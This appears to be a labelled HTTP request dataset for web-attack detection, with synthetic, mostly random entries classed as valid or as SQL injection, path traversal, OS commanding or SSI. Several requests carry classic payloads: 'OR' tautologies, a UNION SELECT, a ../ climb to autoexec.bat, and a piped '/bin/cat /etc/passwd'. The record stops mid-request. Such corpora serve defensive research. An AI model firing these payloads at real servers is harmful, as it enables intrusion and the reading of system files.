Accept-Language: ienOinEr-coldr, t1-vnamfDrD;q=0.6, o-g;q=0.2, de-meeA;q=0.0
Cache-Control: no-cache
Client-ip: 181.153.33.99
Cookie: sydtnr=ndl
Cookie2: $Version="6"
Date: Fri, 24 Dec 04 03:13:46 CET
ETag: W/"95Ig-WIGv8SkessGXoD2"
Expect: radg9ybv
From: ooti@eeee.gov
If-Modified-Since: Mon, 03 Apr 06 05:14:23 GMT
If-Unmodified-Since: Mon, 11 Jun 07 06:54:19 GMT
If-Match: "hC9Na5Bm7vsbNH1mAQt"
If-None-Match: *
If-Range: Mon, 29 Jan 07 07:21:08 CET
Max-Forwards: 720
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: iiaIie tcfW8g=Dcareqt
Authorization: Basic YXI0YTowdHllb3Jh
Range: 75-484,-76,208013-709
Referer: /hjyg.swf
TE: trailers,gzip;q=0.8
Trailer: Expect
User-Agent: Mozilla/1.0 (X11; U; SunOS sun4u 6.5; iS-A2; rv:2.4.7) Gecko/56920096
UA-CPU: StrongARM
UA-Disp: 610,0382,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5438x9106
Via: 6.4 224.37.209.45, weq/0.1 17.133.1.174, 3.4 www.ttlryyt.shtml
Transfer-Encoding: deflate
Upgrade: eiea/2.4, rqd/4.6, saIS/8.7, ado/8.4, esS/3.7
Warning: 797 59.247.222.32 "dfucaar" 
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 6580247381922806
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1he6trh1rab=2856031&oco=63sadwt&qsm2ZUiXpasswd=bebl iiz&F5yN=rjbD2z.tw&PchnmeyU=9VDoW1BAgvxH&ielrgr=931&eAitoSse3aI9=goxi&T12emc=adyrEcsdTtah&yE6RHghjerlssrn=irt&Aee8o=8&tc4lYzhHW4srhi=99&.nodew0Ul-m2J1h=sttae&ewdypk7reuimad=s7roho&7IorEsn=;s&iN2Ahe=oo8tWEnrln

End - Id: 6792
Start - Id: 25651
class: Valid
GET /aaBs.kxSbABd5Z7RshgX/b0zw4tR-rSEElvrsx.png?hwIfdAEosaLp9Al=wehsettcHtCo&hOshu1atT9ett=98461673&btluu0gcqia=aee&WhKVcalibUtb=%28pe&spmIArsL=t&25=e2%5Cme%5Ci9irobstyle&melas=433&MiWWiwindow.openS=A0r30ouqeneeepasswd%40&7R9x0QO=n_4Wk%40DOj HTTP/1.1
Host: 133.4.96.97:33
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn;q=0.9, shift_jis, x-mac-chinesesimp, windows-1251, iso-8859-8-i;q=0.2
Accept-Encoding: 
Accept-Language: oodeEdn-wef;q=0.1
Cache-Control: only-if-cached
Client-ip: 57.161.129.174
Cookie: ntrb=htirdznhiuryBdusi;iitjrz=atonzn6lniea7doi;eriiesct8=n4I;4r=64;aoinyAedojCwf=660328
Cookie2: $Version="0"
Date: Fri, 23 Jan 04 14:25:54 CET
ETag: W/"7eTfVhdTQmnM5XVe75"
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Sun, 05 Jun 05 12:40:57 GMT
If-Unmodified-Since: Wed, 16 Dec 09 11:14:52 GMT
If-Match: *
If-None-Match: "Bh0y1@pQB-f3UF2a"
If-Range: Tue, 07 Jun 05 15:33:43 GMT
Max-Forwards: 1
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nc=cECD7cB1
Range: -8653,3111-
Referer: /Jpidassu/mlonrkt.nsf
TE: deflate,deflate
Trailer: Pragma
User-Agent: rNG7Sh_K http://www.tsoA.org
UA-CPU: 68000
UA-Disp: 349,527,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8213x490
Via: FTP/9.3 www.S5rree.png
Transfer-Encoding: gzip
Upgrade: t4l/3.7, neThay/6.0, otri/7.6, oraT/8.6, imnM/8.2
Warning: 849 www.a80e.jpeg:2725 "efl1xbzhwbe" 
X-Forwarded-For: 7.72.51.122
X-Serial-Number: 33104741
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25651
Start - Id: 11485
class: Valid
GET /dsl9gthCCE/epaOorrh7rno2tRai4n/uidtm2knlquaehgaiz/mv/osj/eu/bxJE4jrPmOw0z.tiff? HTTP/1.0
Host: www.pnnZenea.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 170.41.229.75
Cookie: 2xp_kWMO=994311;60oRo=pokg8teeats;awhedeqoe=r
Cookie2: $Version="49"
Date: Sun, 27 Mar 05 15:53:02 GMT
ETag: "-3tmvwHH0fIma2usr84"
Expect: 100-continue
From: oohw@halud.org
If-Modified-Since: Mon, 23 Feb 04 06:48:19 CET
If-Unmodified-Since: Tue, 15 Nov 05 03:43:02 UTC
If-Match: "owFeHGAgA5fuQwiH2qSi"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 6.0
Pragma: Zichheh='toj'
Proxy-Authorization: Digest qop=ki3naiu
Authorization: NTLM aXM1dHRldWlhaXl1c210aE5pN1RlRW5zVGQyZTE0b0Vkb2VoZTV1
Range: -517746,13-
Referer: /oiuAkE/cfaHld/Fitgal/eNt4eenn.jsp
TE: deflate;q=0.8
Trailer: From
User-Agent: 3fibj2 http://www.li68t8e.org
UA-CPU: 68000
UA-Disp: 9055,045,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9366x217
Via: nt6/1.5 20.236.131.97, 0.0 www.kusw.htm:2741, 3.0 12.118.206.209
Transfer-Encoding: identity
Upgrade: svpsn/2.6, nshret/1.8
Warning: 532 www.guwhhej.jpeg "fEoeeynUyaan2" "Sat, 12 Apr 08 24:22:20 UTC"
X-Forwarded-For: 93.142.43.86
X-Serial-Number: 684447475496
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11485
Start - Id: 24366
class: Valid
GET /i.yF0xLLhxp4WSNPOw/tdntlreeyhgEp3dUDfwc/nlzFGPr-lOp/raDdnGeesaorire/8ht/Dt0/nU0Ji.jpg?aeh=226&e0ao0aT=685256&ehiwzrcorl=ahf&whAtSENOtanmf1=271227&zoTruh97owu=6385517&meao=mnnnai&MM0dqX=134&Sz=1oj%3F2shutdownukaVbve&jbwlLOl56em=seetioehD+ HTTP/1.0
Host: www.aafedss.cz:48982
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-greek;q=0.8, iso-2022-jp;q=0.5
Accept-Encoding: *
Accept-Language: d4afnOt-2iti0r, ewe-bnne;q=0.6, 4nslt-id, ef-Afoee;q=0.5, 8zrhhlr-ulh
Cache-Control: only-if-cached
Client-ip: 5.120.157.173
Cookie: hH6lcxiundscewe=50;andservicesnullY=rGf2x;eiw7annzatshfna=mttaone ;eoxs=MCegio
Cookie2: $Version="7"
Date: Wed, 18 Jul 07 07:49:02 GMT
ETag: W/"iGg4GyFoonVM8sn"
Expect: ldszeo
From: ske7oetj@eo7inee.cz
If-Modified-Since: Thu, 06 Apr 06 17:32:48 CET
If-Unmodified-Since: Mon, 02 Mar 09 03:19:29 UTC
If-Match: *
If-None-Match: *
If-Range: "6cmzok9EcMllWfHOmOkb"
Max-Forwards: 5461
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: Oueba TSkes=e8Hse
Range: 127-
Referer: /bso3Yos/a6Svm/iiaewoo5/1ioogo.mp3
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.8 (compatible; Konqueror/0.2; Win 9x; Hb5mi; iee4iem)
UA-CPU: MIPS
UA-Disp: 801,8735,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 352x5203
Via: HTTP/8.1 209.151.137.182, FTP/6.4 74.68.128.75, HTTP/2.4 www.nnts5.jpeg
Transfer-Encoding: rqscb; cew4ylwR=tNLrjviu
Upgrade: dl2nol/1.8, hopeH/5.6, tvmd/4.2
Warning: 317 www.kcoono.tiff "csd2erdpoarTetors" 
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 24366
Start - Id: 2601
class: Valid
GET /wleae6saoetaeonhnt/ouB.pi/tLifk9jB/cwbrwtPTa@l/asOX4AJVtWz9/1pkpwPTw/Orftxrsnesde8tee3eAt/xNtyW-LfE/irJgN78R6MQ./dle2rRo3tetsrh.cgi?hihI=%25ew%3Dl7c%2F%5Bmhtaccesy%26do&anoonaeilha=4259&ggaeun4shna=elbE&niohdlsms=%40&iqy9=002&a1iheste=h8&P5B0mA4lLvP.=0&prcreefbyAtne=8&nevIegu=i%5C+&hT=RnBeio&ord=cx5oKJ&ajnucgae=012&aalt=i%25%3BTyn++i&197bodyQpNe@I=itrN8hlgrt%2Bnc&ssiyapras9uesM=9accepttoe HTTP/1.0
Host: www.tqss.uk
Connection: close
Accept: audio/*;q=0.6, image/gif
Accept-Charset: x-mac-chinesesimp, iso-2022-kr, x-mac-arabic;q=0.4, windows-874
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=71855
Client-ip: 250.137.202.244
Cookie: tRfOtkm3pn=2099907344;5OEr=sa;8.hKwjKKwgN5=3tdr;aN8ruttw=mUvIJy;c74=75734067
Cookie2: $Version="09"
Date: Fri, 10 Nov 06 03:46:46 CET
ETag: W/"Odn1fMbYERnDz3JfNZL"
Expect: naNene=2hsh
From: ctew@aidI.be
If-Modified-Since: Mon, 17 Apr 06 23:39:37 GMT
If-Unmodified-Since: Sat, 18 Oct 08 11:55:20 GMT
If-Match: "d1ucIF@Flqgeae8p"
If-None-Match: *
If-Range: "31DK_Ef5u7-M2R5O4"
Max-Forwards: 029
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: slEt dtcveeSm=keeh
Range: 358055-4261
Referer: /b3isndua/elDdeo/ahieeu/9peit.jpg
TE: trailers,trailers,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/6.4 (Machintosh; U; Mac OS X 4.2; si-rs; rv:6.4.4) Gecko/13816587
UA-CPU: PowerPC
UA-Disp: 5183,3355,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6037x127
Via: 7.1 217.53.113.177
Transfer-Encoding: identity
Upgrade: hutie/7.1
Warning: 139 202.175.202.238:09 "if85tEa" "Sun, 03 Sep 06 18:25:51 GMT"
X-Forwarded-For: 111.117.154.17
X-Serial-Number: 9671188655936
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2601
Start - Id: 15879
class: Valid
GET /nCCYu7CVIiis1qmQ5Ds@/ncPqdWA/tXCAYQ4aSvz/zeoeneauseneadrmt/ahjncuaewdgn/r-Y/vQ/i.XUfGu9OBl/jbetween6p9JdT7PSRYGC.swf?gs2aigbyi=rRMGovs HTTP/1.1
Host: www.0hsmu9rho.net
Connection: keep-alive
Accept: audio/*, text/*, audio/x-wav
Accept-Charset: x-mac-arabic;q=0.0, x-mac-roman;q=0.8, x-mac-cyrillic;q=0.1, windows-1250;q=0.9
Accept-Encoding: 
Accept-Language: fDhd-oFioa5s8;q=0.0, 0Bvti-eeastnii;q=0.3, a2er-evHg, deuch4i-mhni5, g-rE;q=0.0
Cache-Control: only-if-cached
Client-ip: 114.83.212.254
Cookie: sUgel=408867;tp=hZ-
Cookie2: $Version="34"
Date: Tue, 20 Apr 04 05:08:16 UTC
ETag: W/"zNM1sZ70pkYR7sUn"
Expect: tUOnsd=jes6ndZs;Iihhnrle
From: orsre8c@ig9oe.de
If-Modified-Since: Wed, 26 Oct 05 09:34:52 GMT
If-Unmodified-Since: Sat, 10 Dec 05 11:44:27 GMT
If-Match: *
If-None-Match: "lHEhgy1xA4nFQ3g4"
If-Range: Fri, 22 Jul 05 02:37:01 CET
Max-Forwards: 8
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM WmxpZDRlZU1kT3NlcW9jd2R0YWFsbU5vZXVjME9oc2lvOW9hd2NlaQ==
Authorization: Digest cnonce="oetMsuc"
Range: 141-7620
Referer: /vuintilc.bin
TE: trailers,deflate;q=0.2
Trailer: TE
User-Agent: woemteeonrft
UA-CPU: MIPS
UA-Disp: 318,100,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 664x941
Via: 8.8 105.210.85.155:0, nvti/6.5 101.236.178.43
Transfer-Encoding: identity
Upgrade: ae5a/2.7, top/0.4, ml19a/6.1, llc/5.5, otta/2.3
Warning: 350 131.15.21.242 "Sel0th" "Sun, 27 Jul 08 18:49:35 CET"
X-Forwarded-For: 188.189.177.85
X-Serial-Number: 828350
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15879
Start - Id: 41992
class: SqlInjection
GET /icz9Y@ka0-/hxeHe/LrXlTz/22LDCjQVnFwe/o8b5O1mP6wvQ2d/rFEUHTuTfYis/i1E.js?ebtyednjea=17905010&pftjdidsyhEeop1=do9dY50atedx00onge&ry=c4-IZika8-&emocd=9ygEDh&A3aadhdeav=hS6DIu80&towAia=%27+++++OR+++%27tnAodqcao%27+++%3D+++%27+++&CfromId@BasTsdocument=n-ohlsncenva2y&tesisu2egmt=na&7LPd69WzGJI=taEnig&H9E70=19869&Ynfytves=ial&HtNdDyehistntae=nwSOgwi2&tta7bsdrstiod=7&6Erhwanm=819136&gc5itieh8oR=o%7E%3E%26m%3EuhupdateriTwHl%3Dosy- HTTP/1.0
Host: 16.123.70.11:23577
Connection: keep-alive
Accept: video/mpeg;q=0.1
Accept-Charset: iso-8859-9;q=0.0, windows-1258, big5, macintosh;q=0.7
Accept-Encoding: deflate, gzip;q=0.2, identity, gzip
Accept-Language: sdataf-7bs, eitlds9m-htsi7ae, rsas-sy0ionoq;q=0.0
Cache-Control: max-stale
Client-ip: 134.245.214.117
Cookie: hcg=5375748072
Cookie2: $Version="419"
Date: Sat, 14 Aug 04 06:29:19 GMT
ETag: "@kad9QMXdlP@jeeYm73"
Expect: taus=aiyn
From: wXro@erouh.com
If-Modified-Since: Tue, 04 Sep 07 24:47:25 GMT
If-Unmodified-Since: Sat, 30 Jan 10 01:03:29 UTC
If-Match: *
If-None-Match: "0.rygmfxAVgEQxL8B"
If-Range: *
Max-Forwards: 8
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM c2U0dUNCc2F0ZUVuNWVvZ3RhTW10aWdlbGFvZXU0bUE2YWlpYw==
Authorization: moodt M1ooTnr=oletai
Range: -728027,84041-8,736156-
Referer: http://cLeoHc.ch/8AhhOeim.tar.gz
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.6 (X11; U; Linux i586 1.5; we-or; rv:6.0.8) Gecko/11214685
UA-CPU: x86
UA-Disp: 8277,101,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4309x0685
Via: 6.5 152.108.9.22:2, 2.0 221.26.68.151
Transfer-Encoding: identity
Upgrade: tsem/9.8, icrMn/2.4
Warning: 722 www.ehseBolc.shtml "DAuesoQhhmdauolheiqF" 
X-Forwarded-For: 23.57.98.8
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41992
Start - Id: 45962
class: PathTransversal
GET /NoswehhartoAiv.php3?ehuesopoer=2apdhpa&hbym=29&RbR1lsThN=3&iRTye1a94chel=aenhhatnier&1RIoptllPwzXzecho=78778&omru=4AN&ctrfleEsvo=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&6Bevenughugs9b=dnsmn%26pnn%40erh%29Kj&cn6mA=o54bowUt&6rcle=5&bhtVestotR=ntay&u1deusmhhQe0nk=1d%28e&etbidrWen=141&rO@BG3Ub=21&el=i2HUMsl HTTP/1.1
Host: 153.67.15.113
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: hu='efe8'
Cookie: m@aPAr=ki1nnOyst;gvxVY.drop=70;lhiteae6xsnj=13
Cookie2: $Version="06"
Date: Wed, 19 Oct 05 18:50:31 CET
If-Unmodified-Since: Sat, 03 Apr 10 09:22:26 UTC
If-Match: "wrzQ1MO@qhdCVQ5H8gd"
If-None-Match: *
If-Range: Wed, 27 May 09 19:42:47 GMT
Max-Forwards: 5
Pragma: no-cache
Authorization: Basic bnRhRGd4eXM6dWRhbA==
Referer: http://www.VtEeRsr.ch/ew0h/feeAgtu/etaoda/bnrd.mspx
User-Agent: 5y1Desm http://www.woesyu.biz
UA-Pixels: 1804x199
Via: HTTP/2.9 190.196.108.169, 1.4 189.254.47.60, HTTP/9.5 43.240.173.254
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45962
Start - Id: 43321
class: OsCommanding
GET /4Ftelnetmeval44ZL/Iobt/aLSNx5LZ8.ViG@03YW/aq/l1tnxkooa3emSl8moh/icHpcxTiJFKSmESv/WoLe4nR/Rmtct4i.gif?ame4hnuaterceav=eaEbwa4ykaeng&iegTeoMeriner=0720170&sfenbrtT=tueaqtfoiOesfsh&rnbacltiesvO=1eobheMr&tzd3d6m=sbe&aaEtco=iGhnfbtanad&tgloeotiiea=xp_oi&eJPioa=612&ikuhtse=%7C+++%2Fbin%2Fcat++%2Fetc%2Fpasswd%2500.html&huu8KRsh6oljve2=%3Eametahm HTTP/1.1
Host: 76.193.25.66:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: at3ec8-zna, dsto-teicvmt, cc-c, ns-eE8l;q=0.9, id-leod
Cache-Control: max-age=013
Client-ip: 86.69.183.54
Cookie: jrnrfrthtnlon=Morhesa17hwP;FVG@DD=aartf;in=$ooeh|wgeteopt)zae ooh;sO=96;sdrp=r5WlaieeM;t5Pg_sXPW9A=zsahw
Cookie2: $Version="3"
Date: Tue, 11 Aug 09 04:47:22 GMT
ETag: "L6Op1aeDmT9K1KLGR"
Expect: trl2g=ErI0fhr
From: eTnr@war0.be
If-Modified-Since: Sat, 17 Dec 05 15:46:35 CET
If-Unmodified-Since: Tue, 02 Mar 04 24:52:39 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Apr 05 02:36:54 CET
Max-Forwards: 0181
MIME-Version: 7.9
Pragma: h4nrtte='dR'
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: eDloa hhEAnpe=aemiftda
Range: 2030-1
Referer: http://www.tia6sd.it/Leou/dteoh0/te7tsu.pl
TE: trailers,trailers,gzip
Trailer: Authorization
User-Agent: eitgwhmti/4.3.9
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: FTP/9.5 www.cedud.css
Transfer-Encoding: gzip
Upgrade: eCaleh/5.6, orv/6.7, AtlTSf/2.9, td7/4.6
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 356926769417178111
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43321
Start - Id: 34907
class: Valid
PUT /EDinclude7DngHbIrcw/dP48WHNj0wY9M@A/@76@group bypassthrusock_streamb/ndeetTmtmcddEa0lkle.shtml? HTTP/1.0
Content-Length: 51
Content-Language: E
Content-Encoding: deflate
Content-Location: /fns1acaa/ieFO/beye3n6l.js
Content-MD5: dGJ0b3RHZWphaFRhY25uaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Oct 09 17:27:07 GMT
Last-Modified: Wed, 01 Dec 04 24:03:12 CET
Host: 12.148.112.104:07554
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: n=vetr
Client-ip: 235.153.188.146
Cookie: eaiohsa9=tIztYw2;ejTShkapnfsllhp=aKr8zMtURkx;netjfdwc=cc3gykU
Cookie2: $Version="3"
Date: Tue, 13 Sep 05 23:31:57 CET
ETag: W/"2ZGVZ7-h9APwrNSm"
Expect: 100-continue
From: e6th@heetaerCl7.cz
If-Modified-Since: Sun, 06 Jan 08 11:47:40 GMT
If-Unmodified-Since: Fri, 18 Jan 08 17:07:56 GMT
If-Match: "KrQtnrfnHxLg9lrF.J"
If-None-Match: "JcFvQrH5XhVPD87RlHwM"
If-Range: Thu, 02 Mar 06 21:49:02 GMT
Max-Forwards: 50
MIME-Version: 7.0
Pragma: etaiwnei='j'
Proxy-Authorization: Digest nc=72e2B70C
Authorization: Digest qop=peetd
Range: 068382-
Referer: /irir/cduhReh/ieaTtau/bee4Xsg.cfm
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/0.9 (compatible; 5enn; Mac OS X; 6c0E; etluoHvnL; rS1pyina)
UA-CPU: x86
UA-Disp: 559,503,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4336x049
Via: FTP/2.6 www.Ibta9h.gif:937, HTTP/2.9 www.erhhesp.html:494
Transfer-Encoding: deflate
Upgrade: Osta/4.2, e5crh/8.1, unaht/3.7, orism/4.2
Warning: 174 www.snstmg.html "xe7drtt7wbsgoteohu" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 5563045665
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vecahfe=6244&7xlsr=s_m&JdinsertU=7737571&hh=8350393

End - Id: 34907
Start - Id: 42352
class: SqlInjection
GET /V5Robjectyadminf2m/twoid8sgdxnoasphmn/hLermcThigptjownl/u6y/45@6@wE8abdH3j/90zK7pifTqq1/f.us.q4/eFDmaB7w/eCe.gif?getnieywEmliTa=tl6y&arurukty=dl%24ms+tgtuoa%40rtn%3A1s&sfxopereodWdxan=cM8ac1ean%27+UNION+ALL++SELECT+++sr++FROM+++nossLstdOn++++WHERE+++++%27%27+%3D+%27&6copyHObH=edvSe&qynaoeaturi=ab9 HTTP/1.1
Host: 14.144.243.79
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-age=3217
Client-ip: 167.183.199.0
Cookie: Iol=1W24U_abq-q4;m8a=iTQxbYUmQup;Lace=921667
Cookie2: $Version="04"
Date: Mon, 06 Feb 06 03:39:27 CET
ETag: "cE7xvsfNLwIKkRtDqb"
Expect: ieiqg
From: ttyr@nt7thnt6um.uk
If-Modified-Since: Thu, 19 Apr 07 23:00:35 UTC
If-Unmodified-Since: Fri, 18 Jun 04 09:17:23 UTC
If-Match: "8lnhVBDG@FSbnnEvcgb"
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: "cBFbnS1fVAt0_jy1tV"
Max-Forwards: 5149
MIME-Version: 9.0
Pragma: nllcigJd=tehts9t
Proxy-Authorization: NTLM dWVtZjVhZVpub2RucmxwaW1ib2luaGlub29hU3RwYTE=
Authorization: NTLM c3V0aWFFbXpsN1lmZHJ0ZW91dm5ldHR1YXgycnJjYXI3c3JzeGNycnVydG43
Range: -966,396-333,-3990
Referer: /eeosos/ievnt3/Eehesn/hdvssp.txt
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.4 (Machintosh; U; Mac OS X 5.2; aa-9a; rv:4.6.5) Gecko/11582237
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 999x243
Via: 6.5 www.srTHo.jpeg
Transfer-Encoding: identity
Upgrade: aia9y/5.8, shfr/4.4, ssoa/6.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42352
Start - Id: 36609
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.xdswihi.biz
Connection: keep-alive
Accept: text/*;q=0.5, video/*;q=0.2
Accept-Charset: x-mac-arabic, x-mac-hebrew
Accept-Encoding: *
Accept-Language: n-t598uyR;q=0.7
Cache-Control: max-stale=703
Client-ip: 34.3.142.249
Cookie: iaBoetld=g:r/t;senbh=60176188;e2nle=hsde6 ] @n@6h0d?m8l
Cookie2: $Version="9"
Date: Wed, 19 Dec 07 02:33:37 GMT
ETag: W/"EP-i@KNZB-cwSUgL"
Expect: 100-continue
From: mxpilln@asjinobbr.ch
If-Modified-Since: Thu, 29 Sep 05 18:53:19 UTC
If-Unmodified-Since: Mon, 08 Feb 10 10:00:09 CET
If-Match: *
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: *
Max-Forwards: 93
MIME-Version: 1.9
Pragma: eytR=9
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: NTLM dHNzNWtjNDMxaWVsZXNpdG9sY3NueGxjc3NpZHJ1dHJ0OWE5b3Q=
Range: 017729-
Referer: http://ro81.fr/teBTo/8scshqKt/nN9D/tyitEts/a8brws.pl
TE: trailers
Trailer: Max-Forwards
User-Agent: taunwomTAtld7lf
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 8.0 44.192.193.9, FTP/2.8 www.wdi17E.png
Transfer-Encoding: compress
Upgrade: hr8so/4.0, h23/1.4, yud3rE/6.4, xdnou/0.4, bIe4Er/8.9
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36609
Start - Id: 28684
class: Valid
GET /8dhih/xCD@xDe/9r.gif?sn88u6eb6jipye=Ac%26childp%28nRcbgsoundf+selectv&o_OFjq6i8=dsuCoulneeeZ&dbeTie=06&eeis4htQ=-gfnu9ewt&kehlxd=641098&sdIFgYX=4789580082&rn=%3B%24n HTTP/1.1
Host: www.onrl.be:2846
Connection: r3ap
Accept: image/*
Accept-Charset: iso-10646-ucs-2;q=0.7, iso-8859-8-i, iso-8859-8, euc-cn, windows-1253
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 150.211.232.249
Cookie: ie6between=371407;rrrqierdtuevnre=96594721;cciiuhulOaseai=ntjaouhHeinretmGt;u3VahjI@GeG7=gIr;uosnE9EDzes=z3GvXro
Cookie2: $Version="58"
Date: Sun, 05 Feb 06 03:55:27 CET
ETag: "TP8yCM86v@9eNQkTdSni"
Expect: 100-continue
From: 9rL2esue@fang.it
If-Modified-Since: Sat, 22 Sep 07 20:10:01 GMT
If-Unmodified-Since: Mon, 06 Jul 09 11:12:18 UTC
If-Match: "tSuL95ce1nn@BEkzp@"
If-None-Match: *
If-Range: *
Max-Forwards: 83
MIME-Version: 8.8
Pragma: yAbflne=stmer
Proxy-Authorization: Digest response="402fAbe20bCA7521de8FBa324bDF8Af8"
Authorization: Digest response="C1376A0b2B7CBcBABcd9a1d8b2832F5B"
Range: -440021
Referer: http://www.deyvs.fr/yssua/m3cn9tm/airowosn/dryiqcan.pdf
TE: trailers,chunked;q=0.4,chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Alnd5 (odTFvI9mPe)
UA-CPU: Sparc
UA-Disp: 638,830,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 621x541
Via: 7.6 www.0em5en.js, qoo6ih/6.0 www.lserah.shtml, HTTP/2.8 www.asdteto.tiff:6913
Transfer-Encoding: sktrem
Upgrade: nPnsc9/8.6, Bie/2.0
Warning: 301 www.imbgmn.html "3hfoDiswcieii1rergd1" "Thu, 12 May 05 01:08:10 UTC"
X-Forwarded-For: 70.75.45.186
X-Serial-Number: 244229732731
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 28684
Start - Id: 40417
class: SSI
POST /4Fw/t9-ehTTwFQQhm/iw/dnefIgt/cfiW38Pu/tng2uyheLou5a.gif? HTTP/1.1
Content-Length: 287
Content-Language: bfoo
Content-Encoding: deflate
Content-Location: /lptUo.dll
Content-MD5: YWZvb29jNWF2bmhldWJyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 21 Jun 09 06:05:52 GMT
Last-Modified: Thu, 08 Jul 04 09:52:59 UTC
Host: www.tdd2ltowk.st
Connection: close
Accept: image/*;q=0.3, audio/basic;q=0.3, application/zip
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 21.72.112.249
Cookie: w7qNDlach4=e9mhst;ssdfDvhnei=vbscriptahnPutsmt]0dos
Cookie2: $Version="57"
Date: Sun, 26 Jun 05 21:47:38 CET
ETag: "I_-yW92HFKbHxitO0Z"
Expect: 100-continue
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Thu, 12 Jan 06 15:30:47 CET
If-Unmodified-Since: Fri, 28 Dec 07 09:28:04 CET
If-Match: *
If-None-Match: "sr26yeNLHGQhSyN@1OSz"
If-Range: Thu, 04 Jun 09 22:58:57 CET
Max-Forwards: 0
